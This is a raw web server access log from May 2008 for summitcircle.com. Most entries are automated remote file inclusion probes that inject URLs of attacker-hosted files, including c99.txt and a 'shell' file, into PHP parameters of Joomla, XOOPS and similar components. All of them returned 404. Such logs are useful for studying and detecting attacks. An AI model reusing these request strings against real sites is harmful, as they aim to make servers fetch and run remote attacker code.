67.19.11.122 - - [18/May/2008:17:01:19 -0700] "GET /index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:01:40 -0700] "GET /logs/index1.php?site=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:01:45 -0700] "GET /index1.php?site=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:01:47 -0700] "GET /index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:02:13 -0700] "GET /logs/access_070813.log//account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:02:13 -0700] "GET //account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:02:14 -0700] "GET /logs//account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:02:29 -0700] "GET /logs/access_071231.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:02:29 -0700] "GET /logs/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:02:44 -0700] "GET /logs/access_080107.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:03:08 -0700] "GET /logs/access_070813.log//account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:03:08 -0700] "GET //account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:03:09 -0700] "GET /logs//account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:03:09 -0700] "GET /logs/access_071231.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:03:09 -0700] "GET /logs/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:03:25 -0700] "GET /logs/access_080107.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.62.128.4 - - [18/May/2008:17:03:28 -0700] "GET /page.php?page=http://www.clubdelbarman.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
64.62.128.4 - - [18/May/2008:17:03:28 -0700] "GET /logs/page.php?page=http://www.clubdelbarman.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
208.97.181.220 - - [18/May/2008:17:03:43 -0700] "GET /index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:04:12 -0700] "GET /index.php?pagina=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.47.60.169 - - [18/May/2008:17:04:13 -0700] "GET //s/index.php/urlinn_includes/config.php?dir_ws=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.97.181.220 - - [18/May/2008:17:05:27 -0700] "GET /logs/access_071231.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
208.97.181.220 - - [18/May/2008:17:05:27 -0700] "GET /logs/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
61.222.167.228 - - [18/May/2008:17:05:37 -0700] "GET /logs/access_071022.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
208.97.181.220 - - [18/May/2008:17:05:41 -0700] "GET /logs/access_080107.log/index2.php?DoAction=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:06:19 -0700] "GET /logs/access_071231.log/template.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:06:28 -0700] "GET /template.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:06:33 -0700] "GET /logs/template.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:07:27 -0700] "GET /logs/access_071210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:08:38 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:09:30 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
203.27.8.25 - - [18/May/2008:17:10:05 -0700] "GET /logs/access_071029.log//components/com_simpleboard/image_upload.php?sbp=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:10:05 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:10:06 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:10:06 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:10:29 -0700] "GET /index.php?pagina=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:11:07 -0700] "GET /logs/access_070820.log/index.php?do=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:11:12 -0700] "GET /index.php?do=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:11:17 -0700] "GET /logs/index.php?do=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
67.195.37.95 - - [18/May/2008:17:11:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:11:35 -0700] "GET /default.php?page=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.195.37.95 - - [18/May/2008:17:11:41 -0700] "GET /wsnlinks/search.php?filled=1&condition=or HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:12:55 -0700] "GET /logs/access_080120.log/template.php?pagina=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
88.27.252.89 - - [18/May/2008:17:14:14 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.27.252.89 - - [18/May/2008:17:14:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.27.252.89 - - [18/May/2008:17:14:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:15:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
72.47.201.117 - - [18/May/2008:17:16:02 -0700] "GET /lib/header.php?DOC_ROOT=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
72.47.201.117 - - [18/May/2008:17:16:04 -0700] "GET /lib/header.php?DOC_ROOT=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:16:15 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:16:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
72.36.154.122 - - [18/May/2008:17:16:35 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
72.36.154.122 - - [18/May/2008:17:16:35 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
72.36.154.122 - - [18/May/2008:17:16:36 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
72.36.154.122 - - [18/May/2008:17:16:36 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:16:57 -0700] "GET /logs/access_070813.log//account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:16:58 -0700] "GET //account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:03 -0700] "GET /logs//account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:13 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:13 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:20 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:20 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:20 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:57 -0700] "GET /logs/access_070813.log//account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:57 -0700] "GET //account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:17:57 -0700] "GET /logs//account.php?action=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:17:59 -0700] "GET /logs/access_071217.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:18:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
88.27.252.89 - - [18/May/2008:17:19:02 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:19:05 -0700] "GET /logs/access_071210.log/default.php?page=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:19:05 -0700] "GET /logs/default.php?page=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:19:07 -0700] "GET /logs/access_080210.log//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:19:08 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:19:13 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
72.34.226.62 - - [18/May/2008:17:19:52 -0700] "GET /lib/header.php?DOC_ROOT=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:20:31 -0700] "GET /logs/access_071217.log/default.php?page=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
121.173.130.156 - - [18/May/2008:17:22:26 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.brisatropical.com.br/vendas/administrator/components/com_comprofiler/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
121.173.130.156 - - [18/May/2008:17:22:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.brisatropical.com.br/vendas/administrator/components/com_comprofiler/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:22:53 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:22:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:23:19 -0700] "GET /main.php?x=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:24:09 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:24:12 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
71.195.185.168 - - [18/May/2008:17:24:15 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
150.187.25.20 - - [18/May/2008:17:24:29 -0700] "GET /logs/access_080204.log/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.187.25.20 - - [18/May/2008:17:24:29 -0700] "GET /ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.187.25.20 - - [18/May/2008:17:24:29 -0700] "GET /logs/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:17:25:25 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:25:58 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:25:58 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:26:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:26:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:26:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
85.18.11.77 - - [18/May/2008:17:26:48 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:26:48 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
66.249.66.8 - - [18/May/2008:17:27:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.summitcircle.com"
66.249.66.8 - - [18/May/2008:17:27:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:27:54 -0700] "GET /index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:28:16 -0700] "GET /logs/access_071210.log/default.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:28:24 -0700] "GET /default.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:28:29 -0700] "GET /logs/default.php?page=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
61.222.167.228 - - [18/May/2008:17:28:43 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
150.187.25.20 - - [18/May/2008:17:29:13 -0700] "GET /logs/access_080210.log/ask_password.php?dir=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:30:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:31:07 -0700] "GET /logs/access_070820.log/index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:31:08 -0700] "GET /logs/index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
212.241.215.106 - - [18/May/2008:17:31:49 -0700] "GET /logs//include.php?path[docroot]=http://salimsg.no.sapo.pt/shell?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.241.215.106 - - [18/May/2008:17:31:49 -0700] "GET //include.php?path[docroot]=http://salimsg.no.sapo.pt/shell?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:17:31:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:17:31:53 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:32:17 -0700] "GET /logs/scripts.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:32:23 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.19.144.26 - - [18/May/2008:17:32:48 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:02 -0700] "GET /logs/access_070916.log/index.php?file=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:02 -0700] "GET /index.php?file=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:02 -0700] "GET /logs/index.php?file=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:04 -0700] "GET /logs/access_070916.log/index.php?file=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:05 -0700] "GET /index.php?file=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:17:33:05 -0700] "GET /logs/index.php?file=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:35:33 -0700] "GET /logs/access_071224.log/index.php?do=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:17:35:38 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
213.203.223.93 - - [18/May/2008:17:35:38 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "summitcircle.com"
201.8.28.186 - - [18/May/2008:17:36:36 -0700] "GET /logs/access_071112.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
203.27.8.25 - - [18/May/2008:17:36:47 -0700] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://poko.as.ro/s/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
